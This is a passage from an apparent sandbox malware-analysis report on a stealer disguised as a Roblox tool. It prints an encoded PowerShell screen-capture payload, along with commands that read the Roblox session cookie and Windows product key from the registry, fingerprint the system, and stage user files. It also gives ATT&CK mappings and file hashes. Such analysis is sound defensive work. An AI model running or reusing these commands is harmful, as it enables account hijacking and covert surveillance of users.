QANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
4⤵
- Command and Scripting Interpreter: PowerShell
PID:2932

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hp1krz2l\hp1krz2l.cmdline"
5⤵
PID:5628

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5C36.tmp" "c:\Users\Admin\AppData\Local\Temp\hp1krz2l\CSC54A00F12C66F45FDA38D54E7DCD616D9.TMP"
6⤵
PID:1180

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:2368

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:2524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:3772

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:3352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:4172

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:5808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:6000

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:1700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:2804

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:3668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
3⤵
PID:2392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
4⤵
PID:4224

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
3⤵
PID:6104

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
4⤵
PID:6056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
3⤵
PID:5676

C:\Windows\system32\getmac.exe
getmac
4⤵
PID:5352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
3⤵
PID:2080

C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
4⤵
PID:840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
3⤵
PID:740

C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
4⤵
PID:5136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
3⤵
PID:4608

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
4⤵
PID:1644

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
3⤵
PID:4860

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
4⤵
PID:5580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
3⤵
PID:5852

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
4⤵
- Detects videocard installed
PID:1388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
3⤵
PID:5864

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
4⤵
PID:1308

C:\Users\Admin\Desktop\Nova-Roblox\Nova.exe
"C:\Users\Admin\Desktop\Nova-Roblox\Nova.exe"
1⤵
- Executes dropped EXE
PID:5040

C:\Users\Admin\Desktop\Nova-Roblox\Nova.exe
"C:\Users\Admin\Desktop\Nova-Roblox\Nova.exe"
2⤵
- Executes dropped EXE
PID:5612

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
PID:928

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Nova-Roblox\INFO.txt
1⤵
PID:4848

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Process Discovery

T1057

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7RSqD5tKby.tmp
Filesize
48KB

MD5
349e6eb110e34a08924d92f6b334801d

SHA1
bdfb289daff51890cc71697b6322aa4b35ec9169

SHA256
c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

SHA512
2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

Download Submit
C:\Users\Admin\AppData\Local\Temp\Gc30Mo5Rhp.tmp
Filesize
124KB

MD5
9618e15b04a4ddb39ed6c496575f6f95

SHA1
1c28f8750e5555776b3c80b187c5d15a443a7412

SHA256
a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab

SHA512
f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26

Download Submit
C:\Users\Admin\AppData\Local\Temp\OmQIFjpE6q.tmp
Filesize
152KB

MD5
73bd1e15afb04648c24593e8ba13e983

SHA1
4dd85ca46fcdf9d93f6b324f8bb0b5bb512a1b91

SHA256
aab0b201f392fef9fdff09e56a9d0ac33d0f68be95da270e6dab89bb1f971d8b

SHA512
6eb58fb41691894045569085bd64a83acd62277575ab002cf73d729bda4b6d43c36643a5fa336342e87a493326337ed43b8e5eaeae32f53210714699cb8dfac7

Download Submit
C:\Users\Admin\AppData\Local\Temp\R5q8JXCJQi.tmp
Filesize
20KB

MD5
42c395b8db48b6ce3d34c301d1eba9d5

SHA1
b7cfa3de344814bec105391663c0df4a74310996

SHA256
5644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d

SHA512
7b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38202\VCRUNTIME140.dll
Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38202\_bz2.pyd
Filesize
83KB

MD5
223fd6748cae86e8c2d5618085c768ac

SHA1
dcb589f2265728fe97156814cbe6ff3303cd05d3

SHA256
f81dc49eac5ecc528e628175add2ff6bda695a93ea76671d7187155aa6326abb

SHA512
9c22c178417b82e68f71e5b7fe7c0c0a77184ee12bd0dc049373eace7fa66c89458164d124a9167ae760ff9d384b78ca91001e5c151a51ad80c824066b8ecce6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38202\_cffi_backend.cp312-win_amd64.pyd
Filesize
178KB

MD5
0572b13646141d0b1a5718e35549577c

SHA1
eeb40363c1f456c1c612d3c7e4923210eae4cdf7

SHA256
d8a76d1e31bbd62a482dea9115fc1a109cb39af4cf6d1323409175f3c93113a7

SHA512
67c28432ca8b389acc26e47eb8c4977fddd4af9214819f89df07fecbc8ed750d5f35807a1b195508dd1d77e2a7a9d7265049dcfbfe7665a7fd1ba45da1e4e842

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38202\_ctypes.pyd
Filesize
122KB

MD5
bbd5533fc875a4a075097a7c6aba865e

SHA1
ab91e62c6d02d211a1c0683cb6c5b0bdd17cbf00

SHA256
be9828a877e412b48d75addc4553d2d2a60ae762a3551f9731b50cae7d65b570

SHA512
23ef351941f459dee7ed2cebbae21969e97b61c0d877cfe15e401c36369d2a2491ca886be789b1a0c5066d6a8835fd06db28b5b28fb6e9df84c2d0b0d8e9850e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38202\_decimal.pyd
Filesize
245KB

MD5
3055edf761508190b576e9bf904003aa

SHA1
f0dc8d882b5cd7955cc6dfc8f9834f70a83c7890

SHA256
e4104e47399d3f635a14d649f61250e9fd37f7e65c81ffe11f099923f8532577

SHA512
87538fe20bd2c1150a8fefd0478ffd32e2a9c59d22290464bf5dfb917f6ac7ec874f8b1c70d643a4dc3dd32cbe17e7ea40c0be3ea9dd07039d94ab316f752248

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38202\_hashlib.pyd
Filesize
64KB

MD5
eedb6d834d96a3dffffb1f65b5f7e5be

SHA1
ed6735cfdd0d1ec21c7568a9923eb377e54b308d

SHA256
79c4cde23397b9a35b54a3c2298b3c7a844454f4387cb0693f15e4facd227dd2

SHA512
527bd7bb2f4031416762595f4ce24cbc6254a50eaf2cc160b930950c4f2b3f5e245a486972148c535f8cd80c78ec6fa8c9a062085d60db8f23d4b21e8ae4c0ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38202\_lzma.pyd
Filesize
156KB

MD5
05e8b2c429aff98b3ae6adc842fb56a3

SHA1
834ddbced68db4fe17c283ab63b2faa2e4163824

SHA256
a6e2a5bb7a33ad9054f178786a031a46ea560faeef1fb96259331500aae9154c

SHA512
badeb99795b89bc7c1f0c36becc7a0b2ce99ecfd6f6bb493bda24b8e57e6712e23f4c509c96a28bc05200910beddc9f1536416bbc922331cae698e813cbb50b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38202\_queue.pyd
Filesize
31KB

MD5
6e0cb85dc94e351474d7625f63e49b22

SHA1
66737402f76862eb2278e822b94e0d12dcb063c5

SHA256
3f57f29abd86d4dc8f4ca6c3f190ebb57d429143d98f0636ff5117e08ed81f9b

SHA512
1984b2fc7f9bbdf5ba66716fc60dcfd237f38e2680f2fc61f141ff7e865c0dbdd7cdc47b3bc490b426c6cfe9f3f9e340963abf428ea79eb794b0be7d13001f6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38202\_socket.pyd
Filesize
81KB

MD5
dc06f8d5508be059eae9e29d5ba7e9ec

SHA1
d666c88979075d3b0c6fd3be7c595e83e0cb4e82

SHA256
7daff6aa3851a913ed97995702a5dfb8a27cb7cf00fb496597be777228d7564a

SHA512
57eb36bc1e9be20c85c34b0a535b2349cb13405d60e752016e23603c4648939f1150e4dbebc01ec7b43eb1a6947c182ccb8a806e7e72167ad2e9d98d1fd94ab3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38202\_ssl.pyd
Filesize
174KB

MD5
5b9b3f978d07e5a9d701f832463fc29d

SHA1
0fcd7342772ad0797c9cb891bf17e6a10c2b155b

SHA256
d568b3c99bf0fc35a1f3c5f66b4a9d3b67e23a1d3cf0a4d30499d924d805f5aa

SHA512
e4db56c8e0e9ba0db7004463bf30364a4e4ab0b545fb09f40d2dba67b79b6b1c1db07df1f017501e074abd454d1e37a4167f29e7bbb0d4f8958fa0a2e9f4e405

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38202\base_library.zip
Filesize
1.3MB

MD5
8dad91add129dca41dd17a332a64d593

SHA1
70a4ec5a17ed63caf2407bd76dc116aca7765c0d

SHA256
8de4f013bfecb9431aabaa97bb084fb7de127b365b9478d6f7610959bf0d2783

SHA512
2163414bc01fc30d47d1de763a8332afe96ea7b296665b1a0840d5197b7e56f4963938e69de35cd2bf89158e5e2240a1650d00d86634ac2a5e2ad825455a2d50

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38202\certifi\cacert.pem
Filesize
253KB

MD5
3dcd08b803fbb28231e18b5d1eef4258

SHA1
b81ea40b943cd8a0c341f3a13e5bc05090b5a72a

SHA256
de2fa17c4d8ae68dc204a1b6b58b7a7a12569367cfeb8a3a4e1f377c73e83e9e

SHA512
9cc7106e921fbcf8c56745b38051a5a56154c600e3c553f2e64d93ec988c88b17f6d49698bdc18e3aa57ae96a79ee2c08c584c7c4c91cc6ea72db3dca6ccc2f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38202\libcrypto-3.dll
Filesize
5.0MB

MD5
e547cf6d296a88f5b1c352c116df7c0c

SHA1
cafa14e0367f7c13ad140fd556f10f320a039783

SHA256
05fe080eab7fc535c51e10c1bd76a2f3e6217f9c91a25034774588881c3f99de

SHA512
9f42edf04c7af350a00fa4fdf92b8e2e6f47ab9d2d41491985b20cd0adde4f694253399f6a88f4bdd765c4f49792f25fb01e84ec03fd5d0be8bb61773d77d74d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38202\libffi-8.dll
Filesize
38KB

MD5
0f8e4992ca92baaf54cc0b43aaccce21

SHA1
c7300975df267b1d6adcbac0ac93fd7b1ab49bd2

SHA256
eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a

SHA512
6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38202\libssl-3.dll
Filesize
768KB

MD5
19a2aba25456181d5fb572d88ac0e73e

SHA1
656ca8cdfc9c3a6379536e2027e93408851483db

SHA256
2e9fbcd8f7fdc13a5179533239811456554f2b3aa2fb10e1b17be0df81c79006

SHA512
df17dc8a882363a6c5a1b78ba3cf448437d1118ccc4a6275cc7681551b13c1a4e0f94e30ffb94c3530b688b62bff1c03e57c2c185a7df2bf3e5737a06e114337

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38202\python3.DLL
Filesize
66KB

MD5
79b02450d6ca4852165036c8d4eaed1f

SHA1
ce9ff1b302426d4c94a2d3ea81531d3cb9e583e4

SHA256
d2e348e615a5d3b08b0bac29b91f79b32f0c1d0be48976450042462466b51123

SHA512
47044d18db3a4dd58a93b43034f4fafa66821d157dcfefb85fca2122795f4591dc69a82eb2e0ebd9183075184368850e4caf9c9fea0cfe6f766c73a60ffdf416

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38202\python312.dll
Filesize
6.6MB

MD5
3c388ce47c0d9117d2a50b3fa5ac981d

SHA1
038484ff7460d03d1d36c23f0de4874cbaea2c48

SHA256
c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb

SHA512
e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38202\select.pyd
Filesize
29KB

MD5
92b440ca45447ec33e884752e4c65b07

SHA1
5477e21bb511cc33c988140521a4f8c11a427bcc

SHA256
680df34fb908c49410ac5f68a8c05d92858acd111e62d1194d15bdce520bd6c3

SHA512
40e60e1d1445592c5e8eb352a4052db28b1739a29e16b884b0ba15917b058e66196988214ce473ba158704837b101a13195d5e48cb1dc2f07262dfecfe8d8191

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38202\unicodedata.pyd
Filesize
1.1MB

MD5
16be9a6f941f1a2cb6b5fca766309b2c

SHA1
17b23ae0e6a11d5b8159c748073e36a936f3316a

SHA256
10ffd5207eeff5a836b330b237d766365d746c30e01abf0fd01f78548d1f1b04

SHA512
64b7ecc58ae7cf128f03a0d5d5428aaa0d4ad4ae7e7d19be0ea819bbbf99503836bfe4946df8ee3ab8a92331fdd002ab9a9de5146af3e86fef789ce46810796b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39802\_sqlite3.pyd
Filesize
121KB

MD5
29464d52ba96bb11dbdccbb7d1e067b4

SHA1
d6a288e68f54fb3f3b38769f271bf885fd30cbf6

SHA256
3e96cd9e8abbea5c6b11ee91301d147f3e416ac6c22eb53123eaeae51592d2fe

SHA512
3191980cdf4ab34e0d53ba18e609804c312348da5b79b7242366b9e3be7299564bc1ec08f549598041d434c9c5d27684349eff0eaa45f8fa66a02dd02f97862b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39802\sqlite3.dll
Filesize
1.5MB

MD5
612fc8a817c5faa9cb5e89b0d4096216

SHA1
c8189cbb846f9a77f1ae67f3bd6b71b6363b9562

SHA256
7da1c4604fc97ba033830a2703d92bb6d10a9bba201ec64d13d5ccbfecd57d49

SHA512
8a4a751af7611651d8d48a894c0d67eb67d5c22557ba4ddd298909dd4fb05f5d010fe785019af06e6ca2e406753342c54668e9c4e976baf758ee952834f8a237

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xsrh2f0f.fgm.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\dfYTMzPhQO.tmp
Filesize
100KB

MD5
d4993802b9cf3203200f899233c3e2fc

SHA1
a632e8d796c8a0d1cf8cda55aa882b1a82b7318f

SHA256
cff606c51ac13f4352de08f7838939c1e261bdc232a10bb94f6924d00cbd0dd6

SHA512
1910cf846fe61ef744dc6bcf9062caaf6ab1856a64bd8aa6849cbddcdc8fa921f0cef16d0d9cc38842345f5873724b27764307076bd50bd46bb74f643cde03bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\fnuHROsN27.tmp
Filesize
46KB

MD5
8f5942354d3809f865f9767eddf51314

SHA1
20be11c0d42fc0cef53931ea9152b55082d1a11e

SHA256
776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea

SHA512
fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218

Download Submit
C:\Users\Admin\AppData\Local\Temp\h0bxVb1QG6.tmp
Filesize
116KB

MD5
f70aa3fa04f0536280f872ad17973c3d

SHA1
50a7b889329a92de1b272d0ecf5fce87395d3123

SHA256
8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

SHA512
30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

Download Submit
C:\Users\Admin\AppData\Local\Temp\zrrNBsfVxR.tmp
Filesize
20KB

MD5
49693267e0adbcd119f9f5e02adf3a80

SHA1
3ba3d7f89b8ad195ca82c92737e960e1f2b349df

SHA256
d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f

SHA512
b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏   \Directories\Documents.txt
Filesize
766B

MD5
ea4af61efdb8ad12d61b7f2ff0fa2f0e

SHA1
70afff36328e027ac1a2ebb244fdc1af4b3bcfb9

SHA256
b02b6b5ff3ea2846ce39c4934010d3dd5328e4c73aec26d97c935522493e9098

SHA512
ac1fffd75d544cdabf947c5141e9e0ead800ed66505bb1000d09a9fd69cd80f49af5027521b7ca9bc62e7e39c5b505df2308292b69ca89d145cd1df9e90004bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏   \Directories\Downloads.txt
Filesize
762B

MD5
cd18594c216e5ff6ac2fdc9083f5c688

SHA1
4b2ad1528cd88e2b61f28c350e907acc754a4c77

SHA256
9dc567293acffaff1b3dfb8b25c57c675a4a1e4dd5603e42d534509eb995a2a8

SHA512
afff8c26b3fe195eaca727934c3c03cbaaea1f2a77d22c740bdb5806c4acffb24e603837f0473648e207493791668e0200cc45763d18ec6da839e6f9ba782379

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏   \Directories\Music.txt
Filesize
794B

MD5
5de5b61d9fe74a429f17a83b03c86262

SHA1
2adaa7697eb52d46c6812899f4b79558b9c5c6fe

SHA256
a67262136ad381360539245ccc9841527b43756fe212abccf523666e3132d2cd

SHA512
6279791000f3075a3260b8c1eed053b000c0cd76412acb3f7eb63d0a7fa968a33923e0d08abd9bb59842c46a4e60ef4bd0100522c65a9b08d3b2e49ae3233990

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏   \Directories\Pictures.txt
Filesize
442B

MD5
d470ccd2b9c54abb96a8edfdecf3844e

SHA1
c2f095e60bf002e0659ba57b8fc354896337acf1

SHA256
957fb622a0f1df05edcbdc3d36ff8a85eb8c30477a6136199d8db561455acaba

SHA512
7ba1e24f33aab915e2942330e9dfc217f7586cece751b04958a56dc66a3f95e2ea50ece8bbda16588b0fe4097a83a77e7e3ef754ccce2858682c4c25e9911efc

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏   \Directories\Videos.txt
Filesize
30B

MD5
e140e10b2b43ba6f978bee0aa90afaf7

SHA1
bbbeb7097ffa9c2daa3206b3f212d3614749c620

SHA256
c3a706e5567ca4eb3e18543296fa17e511c7bb6bef51e63bf9344a59bf67e618

SHA512
df5b92757bf9200d0945afda94204b358b9f78c84fbaeb15bdf80eae953a7228f1c19fdf53ed54669562b8f0137623ea6cee38f38ef23a6f06de1673ff05733f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏   \System\MAC Addresses.txt
Filesize
232B

MD5
66ee628ef8e0cb7169ac3bcc3bdd6967

SHA1
2483dae9be8388c1745bdf89154fc092eca898b1

SHA256
2c658ae2b6e64bbb31ddc622b1b4c040588252c29b669fdfe1fc1b58c2059466

SHA512
9b74158e8cc93fd5c7dd97d33132cfb9b469a4a2b800435ff0c739fc99e2e43511162aa3872625bde2d4c75cd6e05aff2a6e90651630fe1e1546c0f186744128

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏   \System\System Info.txt
Filesize
2KB

MD5
cdf8340b3af2ad2f64c5693520bd1d6f

SHA1
0def1b4d327ac5b8251f73d218701475720a878a

SHA256
4ceb3c8e913211936fa472fd41b41fe693ee7923edd627a656c15fe4a643bf54

SHA512
e87ab89081ab52aacee5797457fadf65baa7da67514c37d815553efbaaf134f1ce5bac12501c5d075b8bdf42bd85686cf01ee7cdbd992a518cbc47e9a94e213b

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Desktop\CheckpointInstall.png
Filesize
630KB

MD5
ae992b4a2bac18ce223c47455edefbc3

SHA1
6c14263bc4d7e7d4cc3e6d42d3226afb298d2d9f

SHA256
856a2369a26f983f6560b0430210f9ba998ae83f6d5ea206db958d3d537099e3

SHA512
7b4894f318464127a11a5ccb9205714f073c3979a675f1de105d5eec6812b57459f52f8852bf83edaffa238a28de1ed4903706981bcd8650bfffd12b00909945

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Desktop\ResolveSkip.doc
Filesize
539KB

MD5
33af844f7721a87bfd1114c5bddff904

SHA1
5c0dc799275a1be36bf538beb0d22922cc736a5a

SHA256
6151b4877e889889c648e8b0204cecd0a87729ae5632eb1ef9c8416e98525608

SHA512
b87af243c20cf503d17e2ff1cbc5927f3bec4086a9d824d8ef214e138ecb61906c3f7d554ad37d70d088e4ade29af1ba59bbb6749800b10f1d2c5f83c46875e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Desktop\SyncEnter.jpg
Filesize
1.1MB

MD5
9bde0dd0a40540be4abc5e562cb9efdd

SHA1
d2098bc9bbc8e4879d3c56320f724f0c6b82dbcc

SHA256
7ff4fb44d56a2c52fb1b1fea3691cede2c4f4bab1a969913f908e6b4701b7377

SHA512
bc2854adda6df7872ce533692e328a9d54855cc430be6a23653a550d73c668f14e1a8e0021eb0d78c84ee9d7fb92169e3ab23a4935070c49791327acdade8273

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Documents\Are.docx
Filesize
11KB

MD5
a33e5b189842c5867f46566bdbf7a095

SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196

SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Documents\BackupSelect.xls
Filesize
710KB

MD5
619e72edf9c10574f6d8baf995d5e95c

SHA1
553b4b7825c61bc5113312e1f153fa66505afabb

SHA256
5a7170ab0244cd67cb007c2a7013a9213693c27616089bc92d13d2a72786a698

SHA512
a0a97adc5c96eb587931239895012df54bcfcb8492ca2423f02ea48d469f3fb71d1d3152d52830ac39f5e3ec0b6739f545b36781d292880ecb3873a72407426f

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Documents\ClearSet.xls
Filesize
794KB

MD5
4abdb1feaef3b09b438917f523b7b67c

SHA1
bca83232d79d2976c55424b3ceaf032323cc455d

SHA256
330737ad5f335c930a1316cdf79bb7a81c43b1e54a3c92b6c3597cd635dcb5cd

SHA512
f31134cceda87786f4866b98645e7dd8ba50c1a669fe2956f314d954bc4384094d6a886492aafc4baba0db0f9cde479e923e1f5e5f97f51a1d13e736d47862b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Documents\DebugTrace.txt
Filesize
431KB

MD5
b22fe41df68b6bc23b0d41296eaafbf6

SHA1
5869f43a8068a98302ed03ce5dc9c1970d744f88

SHA256
b02f922b89b1333a8022ed39b5b4cc9aea01b812d1d0d3aa4bd7da0ea3a4cbd3

SHA512
